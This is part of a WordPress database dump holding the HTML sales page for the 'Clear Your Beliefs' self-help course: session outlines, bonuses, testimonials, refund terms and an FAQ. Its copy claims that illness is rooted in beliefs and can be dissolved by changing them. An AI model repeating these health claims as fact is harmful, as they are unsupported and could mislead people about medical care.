height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>"\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior.\n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<h3 class="widget-title">CYB banner header</h3>			 <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">', 'p', '', 'inherit', 'open', 'open', '', '2161-revision-v1', '', '', '2015-05-12 12:53:05', '2015-05-12 17:53:05', '', 2161, 'http://clearyourbeliefs.com/2161-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2165, 2, '2015-05-12 12:51:19', '2015-05-12 17:51:19', '&nbsp;<h3 class="widget-title">Video Clear Your Beliefs</h3><p> </p><p> </p><h3 class="widget-title">Red quote</h3>			<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h3 class="widget-title">Bullets</h3><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\nThe best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" />\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.\n\n<strong>We literally create our reality with our beliefs.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, 